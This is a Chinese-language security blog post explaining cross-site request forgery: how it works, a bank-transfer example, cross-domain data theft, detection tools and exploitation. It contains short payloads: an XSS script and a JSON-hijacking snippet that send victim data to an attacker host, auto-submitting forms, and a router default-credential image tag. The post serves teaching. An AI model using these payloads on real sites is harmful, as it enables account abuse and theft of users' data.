<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ashin9.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 CSRF理解CSRF&#x2F;XSRF跨站点请求伪造(Cross—Site Request Forgery)，也被称为：one click attack&#x2F;session riding。跟XSS攻击一样，存在巨大的危害性，可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发">
<meta property="og:type" content="article">
<meta property="og:title" content="WEB安全—CSRF基础及利用">
<meta property="og:url" content="https://ashin9.github.io/2019/07/22/WEB%E5%AE%89%E5%85%A8%E2%80%94CSRF%E5%9F%BA%E7%A1%80%E5%8F%8A%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Ashing&#39;s Blog">
<meta property="og:description" content="0x01 CSRF理解CSRF&#x2F;XSRF跨站点请求伪造(Cross—Site Request Forgery)，也被称为：one click attack&#x2F;session riding。跟XSS攻击一样，存在巨大的危害性，可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-07-22T13:00:00.000Z">
<meta property="article:modified_time" content="2023-03-15T03:54:37.516Z">
<meta property="article:author" content="Ashing">
<meta property="article:tag" content="CSRF">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ashin9.github.io/2019/07/22/WEB%E5%AE%89%E5%85%A8%E2%80%94CSRF%E5%9F%BA%E7%A1%80%E5%8F%8A%E5%88%A9%E7%94%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>WEB安全—CSRF基础及利用 | Ashing's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ashing's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">想学的太多 懂得的太少</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ashin9.github.io/2019/07/22/WEB%E5%AE%89%E5%85%A8%E2%80%94CSRF%E5%9F%BA%E7%A1%80%E5%8F%8A%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/dxx.jpg">
      <meta itemprop="name" content="Ashing">
      <meta itemprop="description" content="Cyber Security">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ashing's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WEB安全—CSRF基础及利用
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-07-22 21:00:00" itemprop="dateCreated datePublished" datetime="2019-07-22T21:00:00+08:00">2019-07-22</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-03-15 11:54:37" itemprop="dateModified" datetime="2023-03-15T11:54:37+08:00">2023-03-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">WEB安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB%E5%AE%89%E5%85%A8/Browser%E7%AB%AF%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Browser端安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x01-CSRF理解"><a href="#0x01-CSRF理解" class="headerlink" title="0x01 CSRF理解"></a>0x01 CSRF理解</h3><p><strong>CSRF&#x2F;XSRF跨站点请求伪造(Cross—Site Request Forgery)，也被称为：one click attack&#x2F;session riding。跟XSS攻击一样，存在巨大的危害性，可以这样来理解：</strong>攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。 </p>
<h3 id="0x02-CSRF攻击原理及过程"><a href="#0x02-CSRF攻击原理及过程" class="headerlink" title="0x02 CSRF攻击原理及过程"></a>0x02 CSRF攻击原理及过程</h3><ul>
<li><p><strong>如下：</strong>其中Web A为存在CSRF漏洞的网站，Web B为攻击者构建的恶意网站，User C为Web A网站的合法用户。</p>
</li>
<li><p><strong>1. 用户C打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；</strong></p>
</li>
<li><p><strong>2.在用户信息通过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功，可以正常发送请求到网站A；</strong></p>
</li>
<li><p><strong>3. 用户未退出网站A之前，在同一浏览器中，打开一个TAB页访问网站B；</strong></p>
</li>
<li><p><strong>4. 网站B接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点A；</strong></p>
</li>
<li><p><strong>5. 浏览器在接收到这些攻击性代码后，根据网站B的请求，在用户不知情的情况下携带Cookie信息，向网站A发出请求。网站A并不知道该请求其实是由B发起的，所以会根据用户C的Cookie信息以C的权限处理该请求，导致来自网站B的恶意代码被执行。</strong></p>
</li>
</ul>
<h4 id="CSRF攻击实例"><a href="#CSRF攻击实例" class="headerlink" title="CSRF攻击实例"></a>CSRF攻击实例</h4><ul>
<li>受害者 Bob 在银行有一笔存款，通过对银行的网站发送请求：</li>
</ul>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span>bank.example/withdraw?account=bob&amp;amount=<span class="number">1000000</span>&amp;<span class="keyword">for</span>=bob2 </span><br></pre></td></tr></table></figure>

<ul>
<li>可以使 Bob 把 1000000 的存款转到 bob2 的账号下。通常情况下，该请求发送到网站后，服务器会先验证该请求是否来自一个合法的 session，并且该 session 的用户 Bob 已经成功登陆。</li>
<li>黑客 Mallory 自己在该银行也有账户，他知道上文中的 URL 可以把钱进行转帐操作。Mallory 可以自己发送一个请求给银行：</li>
</ul>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span>bank.example/withdraw?account=bob&amp;amount=<span class="number">1000000</span>&amp;<span class="keyword">for</span>=Mallory。</span><br></pre></td></tr></table></figure>

<ul>
<li><p>但是这个请求来自 Mallory 而非 Bob，他不能通过安全认证，因此该请求不会起作用。 这时，Mallory 想到使用 CSRF 的攻击方式，他先自己做一个网站，在网站中放入如下代码：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">src=“http:<span class="regexp">//</span>bank.example/withdrawaccount=bob&amp;amount=<span class="number">1000000</span>&amp;<span class="keyword">for</span>=Mallory ”</span><br></pre></td></tr></table></figure>
</li>
<li><p>并且通过广告等诱使 Bob 来访问他的网站。当 Bob 访问该网站时，上述 url 就会从 Bob 的浏览器发向银行，而这个请求会附带 Bob 浏览器中的 cookie 一起发向银行服务器。</p>
</li>
<li><p>大多数情况下，该请求会失败，因为他要求 Bob 的认证信息。但是，如果 Bob 当时恰巧刚访问他的银行后不久，他的浏览器与银行网站之间的 session 尚未过期，浏览器的 cookie 之中含有 Bob 的认证信息。</p>
</li>
<li><p>这时，悲剧发生了，这个 url 请求就会得到响应，钱将从 Bob 的账号转移到 Mallory 的账号，而 Bob 当时毫不知情。等以后 Bob 发现账户钱少了，即使他去银行查询日志，他也只能发现确实有一个来自于他本人的合法请求转移了资金，没有任何被攻击的痕迹。而 Mallory 则可以拿到钱后逍遥法外。</p>
</li>
</ul>
<h3 id="0x03-CSRF攻击获取数据的方法"><a href="#0x03-CSRF攻击获取数据的方法" class="headerlink" title="0x03 CSRF攻击获取数据的方法"></a>0x03 CSRF攻击获取数据的方法</h3><ul>
<li><p><strong>要获取的关键数据：</strong></p>
<ul>
<li><strong>用户 id</strong></li>
<li><strong>用户昵称</strong></li>
<li><strong>用户 email</strong></li>
<li><strong>用户个人页面地址</strong></li>
<li><strong>…..</strong></li>
</ul>
</li>
</ul>
<h4 id="同域内"><a href="#同域内" class="headerlink" title="同域内"></a>同域内</h4><ul>
<li><strong>CSRF攻击获取数据几乎没有任何限制</strong></li>
</ul>
<h4 id="跨域"><a href="#跨域" class="headerlink" title="跨域"></a>跨域</h4><p>  <strong>CSRF 攻击获取数据的几种方法总结：</strong></p>
<ul>
<li><strong>1、XSS</strong></li>
</ul>
 <figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">如之前关于XSS文章做的三方的演示，使用目标站点上的XSS漏洞：</span><br><span class="line">&lt;iframe width=<span class="number">0</span> height=<span class="number">0</span> src=‘http:<span class="regexp">//</span>目标站点<span class="regexp">/search.php?k=“&gt;&lt;script src=http:/</span><span class="regexp">/恶意站点/g</span>et.js&gt;&lt;<span class="regexp">/script&gt;’&gt;&lt;/i</span>frame&gt;</span><br><span class="line"></span><br><span class="line">其中get.js 的代码为：</span><br><span class="line"><span class="regexp">//u</span>se DOM method to get your data</span><br><span class="line">new Image(). src=‘http:<span class="regexp">//</span>恶意站点/a.php?data=‘+data;</span><br><span class="line"></span><br><span class="line">恶意站点的 a.php 文件接收唯一标识等数据，该唯一标识可以是 url 中的或是目标站点url 对应的内容中的。这样受害者就会访问到第三方的恶意网站从而泄露信息。</span><br></pre></td></tr></table></figure>

<ul>
<li><p><strong>2、服务端代理技术</strong></p>
</li>
<li><p><strong>3、JSON Hijacing</strong></p>
</li>
</ul>
 <figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">目标站点使用了 JSON 数据传输用户私有数据，其中包含需要的唯一标识等信息。</span><br><span class="line"></span><br><span class="line">相关代码：</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="keyword">function</span> <span class="title function_">hijack</span>(<span class="params">o</span>)&#123;</span></span><br><span class="line"><span class="language-javascript"><span class="comment">//use DOM method to get your data</span></span></span><br><span class="line"><span class="language-javascript"><span class="keyword">new</span> <span class="title class_">Image</span>().<span class="property">src</span>=<span class="string">&quot;http://192.168.1.2/JSONHiJack.asp?hi=&quot;</span>+<span class="built_in">escape</span>(data);</span></span><br><span class="line"><span class="language-javascript">&#125;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">http://api.fanfou.com/private_messages/inbox.json?callback</span>=<span class="string">hijack&amp;count</span>=<span class="string">2</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><strong>4、Flash AsctionScript（crossdomain.xml）</strong></li>
</ul>
 <figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">前提是目标站点下存在crossdomain.xml文件，且其配置允许其他域的<span class="keyword">AS</span>脚本进行跨域请求。</span><br><span class="line">&lt;?<span class="type">xml</span> version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;<span class="keyword">cross</span>-<span class="keyword">domain</span>-<span class="keyword">policy</span>&gt;</span><br><span class="line">&lt;allow-<span class="keyword">access</span>-<span class="keyword">from</span> <span class="keyword">domain</span>=&quot;*&quot; /&gt;</span><br><span class="line">&lt;/<span class="keyword">cross</span>-<span class="keyword">domain</span>-<span class="keyword">policy</span>&gt;</span><br><span class="line"></span><br><span class="line">相关代码：</span><br><span class="line"><span class="keyword">import</span> flash.net.*; </span><br><span class="line">var _l = <span class="built_in">new</span> URLLoader(<span class="built_in">new</span> URLRequest(“http://目标站点/&quot;));</span><br><span class="line">_l.addEventListener(Event.COMPLETE,function()&#123;text1.text = _l.data&#125;);</span><br><span class="line">_l.load();</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="0x04-检测方法"><a href="#0x04-检测方法" class="headerlink" title="0x04 检测方法"></a>0x04 检测方法</h3><ul>
<li><p>最简单的方法就是抓取一个正常请求的数据包，去掉 Referer 字段后再重新提交，如果该提交还有效，那么基本上可以确定存在 CSRF 漏洞。</p>
</li>
<li><p>一些专门针对 CSRF 漏洞进行检测的工具，如CSRFTester，CSRF Request Builder 等。</p>
</li>
</ul>
<h4 id="以-CSRFTester-工具为例"><a href="#以-CSRFTester-工具为例" class="headerlink" title="以 CSRFTester 工具为例"></a>以 <strong>CSRFTester</strong> 工具为例</h4><ul>
<li><p><strong>使用 CSRFTester 进行测试时：</strong></p>
<ul>
<li>1.抓取我们在浏览器中访问过的所有链接以及所有的表单等信息</li>
<li>2.通过在 CSRFTester 中修改相应的表单等信息，重新提交，这相当于一次伪造客户端请求。</li>
<li>3.如果修改后的测试请求成功被网站服务器接受，则说明存在CSRF 漏洞。</li>
</ul>
</li>
<li><p>当然此款工具也可以被用来进行 CSRF 攻击。</p>
</li>
</ul>
<h3 id="0x05-CSRF利用"><a href="#0x05-CSRF利用" class="headerlink" title="0x05 CSRF利用"></a>0x05 CSRF利用</h3><ul>
<li><p><strong>攻击者发现CSRF漏洞——构造代码——发送给受害人——受害人打开——受害人执行代码——完成攻击</strong></p>
</li>
<li><p>相比于XSS少一个获取cookie的步骤。</p>
</li>
<li><p>思路：诱使管理员打开构造的代码！</p>
</li>
<li><p>CSRF出现的地方通常在权限控制的地方 如会员中心、后台管理、用户注册、发布帖子、用户后台处、交易管理处这几个地方</p>
</li>
</ul>
<h4 id="GET类型CSRF"><a href="#GET类型CSRF" class="headerlink" title="GET类型CSRF"></a>GET类型CSRF</h4><ul>
<li><p><strong>一般由于程序员安全意识不高造成</strong></p>
</li>
<li><p><strong>诱导打开插入恶意连接的代码-&gt;迅速携带cookie执行恶意操作</strong></p>
</li>
</ul>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=http:<span class="regexp">//</span>xxxx.org<span class="regexp">/csrf.php?xx=11 /</span>&gt;</span><br></pre></td></tr></table></figure>



<h4 id="POST型CSRF"><a href="#POST型CSRF" class="headerlink" title="POST型CSRF"></a>POST型CSRF</h4><ul>
<li><p><strong>危害小于GET型</strong></p>
</li>
<li><p><strong>自动提交表单</strong>：访问该页面后，表单会自动提交，相当于模拟用户完成了一次POST操作。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">http://wooyun.org/csrf.php</span> <span class="attr">method</span>=<span class="string">POST</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;xx&quot;</span> <span class="attr">value</span>=<span class="string">&quot;11&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="number">0</span>].<span class="title function_">submit</span>(); </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span> </span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="其他利用"><a href="#其他利用" class="headerlink" title="其他利用"></a>其他利用</h4><ul>
<li><strong>过基础认证的CSRF(常用于路由器):</strong></li>
</ul>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">&lt;img src=http://admin:admin@<span class="number">192.168.1.1</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p><strong>加载该图片后，路由器会给用户一个合法的SESSION，就可以进行下一步操作了。</strong></p>
</li>
<li><p><strong>CSRF攻击会根据场景的不同而危害迥异。小到诱使用户留言，大到垂直越权进行操作。这些攻击的请求都是跨域发出,并且至关重要的一点，都是在受害者的身份得到认证以后发生的。另外，第一个场景中攻击时并没有使用JavaScrpit，这说明CSRF攻击并不依赖于JavaScript。</strong></p>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CSRF/" rel="tag"># CSRF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/07/20/WEB%E5%AE%89%E5%85%A8%E2%80%94XSS%E8%A7%A6%E5%8F%91%E3%80%81%E7%BB%95%E8%BF%87%E3%80%81%E7%9B%97%E5%8F%96Cookie/" rel="prev" title="WEB安全—XSS触发、绕过、盗取Cookie">
      <i class="fa fa-chevron-left"></i> WEB安全—XSS触发、绕过、盗取Cookie
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/07/25/WEB%E5%AE%89%E5%85%A8%E2%80%94CSRF%E9%98%B2%E5%BE%A1%E5%8F%8A%E7%BB%95%E8%BF%87/" rel="next" title="WEB安全—CSRF防御及绕过">
      WEB安全—CSRF防御及绕过 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-CSRF%E7%90%86%E8%A7%A3"><span class="nav-number">1.</span> <span class="nav-text">0x01 CSRF理解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-CSRF%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86%E5%8F%8A%E8%BF%87%E7%A8%8B"><span class="nav-number">2.</span> <span class="nav-text">0x02 CSRF攻击原理及过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#CSRF%E6%94%BB%E5%87%BB%E5%AE%9E%E4%BE%8B"><span class="nav-number">2.1.</span> <span class="nav-text">CSRF攻击实例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-CSRF%E6%94%BB%E5%87%BB%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-number">3.</span> <span class="nav-text">0x03 CSRF攻击获取数据的方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%8C%E5%9F%9F%E5%86%85"><span class="nav-number">3.1.</span> <span class="nav-text">同域内</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%B7%A8%E5%9F%9F"><span class="nav-number">3.2.</span> <span class="nav-text">跨域</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95"><span class="nav-number">4.</span> <span class="nav-text">0x04 检测方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%A5-CSRFTester-%E5%B7%A5%E5%85%B7%E4%B8%BA%E4%BE%8B"><span class="nav-number">4.1.</span> <span class="nav-text">以 CSRFTester 工具为例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-CSRF%E5%88%A9%E7%94%A8"><span class="nav-number">5.</span> <span class="nav-text">0x05 CSRF利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#GET%E7%B1%BB%E5%9E%8BCSRF"><span class="nav-number">5.1.</span> <span class="nav-text">GET类型CSRF</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#POST%E5%9E%8BCSRF"><span class="nav-number">5.2.</span> <span class="nav-text">POST型CSRF</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E5%88%A9%E7%94%A8"><span class="nav-number">5.3.</span> <span class="nav-text">其他利用</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ashing"
      src="/images/dxx.jpg">
  <p class="site-author-name" itemprop="name">Ashing</p>
  <div class="site-description" itemprop="description">Cyber Security</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ashin9" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ashin9" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:ashin9@foxmail.com" title="E-Mail → mailto:ashin9@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://ttonys.github.io/" title="https:&#x2F;&#x2F;ttonys.github.io&#x2F;" rel="noopener" target="_blank">tongs</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://j0k3r.top/" title="http:&#x2F;&#x2F;j0k3r.top&#x2F;" rel="noopener" target="_blank">joker</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://daolgts.github.io/" title="https:&#x2F;&#x2F;daolgts.github.io" rel="noopener" target="_blank">daolgts</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://wzt.ac.cn/" title="https:&#x2F;&#x2F;wzt.ac.cn&#x2F;" rel="noopener" target="_blank">CataLpa</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://asa9ao.xyz/" title="http:&#x2F;&#x2F;asa9ao.xyz&#x2F;" rel="noopener" target="_blank">Asa9ao</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://v0w.top/" title="https:&#x2F;&#x2F;v0w.top" rel="noopener" target="_blank">vOw</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2018 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ashing</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
